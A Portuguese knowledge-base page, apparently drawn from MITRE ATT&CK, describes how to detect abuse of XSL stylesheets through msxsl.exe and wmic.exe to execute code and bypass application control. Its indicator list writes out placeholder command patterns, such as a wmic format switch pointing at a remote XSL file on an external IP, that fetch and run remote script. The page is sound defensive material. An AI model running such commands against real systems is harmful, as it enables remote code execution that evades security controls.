det0205-detect-xsl-script-abuse-via-msxsl-and-wmic

# DET0205 — Detect XSL Script Abuse via msxsl and wmic ## Descrição Esta estratégia detecta o abuso de folhas de estilo XSL (eXtensible Stylesheet Language) como vetor de execução de código — mapeada para [[T1220 — XSL Script Processing]]. Adversários utilizam `msxsl.exe` (Microsoft XSL Command-Line Transformation Utility) ou `wmic.exe` com o parâmetro `format:` para processar arquivos XSL contendo scripts JScript ou VBScript embarcados, executando código arbitrário enquanto contornam controles de execução baseados em extensão de arquivo. A detecção monitora invocação de `msxsl.exe` com arquivos XSL de URLs remotas ou caminhos incomuns, e uso de `wmic.exe` com parâmetro `format:` apontando para arquivo XSL não-padrão. A técnica é efetiva para bypass de Application Control pois `msxsl.exe` é assinado pela Microsoft e `wmic.exe` é utilitário nativo. Ambos podem executar código de URLs remotas sem download explícito. O analytics AN0581 correlaciona: `msxsl.exe <XML_input> <XSL_de_URL_remota>` ou `wmic process get /format:<URL_de_XSL>`, seguido de processo filho gerado a partir do script embedded no XSL. Análise do arquivo XSL (quando disponível) para detectar tags `<msxsl:script>` com código malicioso aumenta a detecção preventiva. ## Indicadores de Detecção - `msxsl.exe` executado com segundo argumento sendo URL HTTP/HTTPS - `wmic.exe process get brief /format:"http://<IP_externo>/<arquivo>.xsl"` - `msxsl.exe` ou `wmic.exe` gerando processo filho (`cmd.exe`, `powershell.exe`, `mshta.exe`) - Arquivo `.xsl` contendo tag `<msxsl:script language="JScript">` com código de execução - `msxsl.exe` executado por processo de browser, Office ou cliente de e-mail - Conexão de rede de `msxsl.exe` para download de arquivo XSL remoto - `wmic.exe` com argumento `format:` apontando para arquivo em `%TEMP%` recém-criado ## Técnicas Relacionadas - [[t1220-xsl-script-processing|T1220 — XSL Script Processing]] - [[t1218-system-binary-proxy-execution|T1218 — System Binary Proxy Execution]] - [[t1059-command-and-scripting-interpreter|T1059 — Command and Scripting Interpreter]] - [[t1047-windows-management-instrumentation|T1047 — Windows Management Instrumentation]] ## Analytics Relacionadas - [[an0581-analytic-0581|AN0581 — Analytic 0581]] --- *Fonte: [MITRE ATT&CK — DET0205](https://attack.mitre.org/detectionstrategies/DET0205)*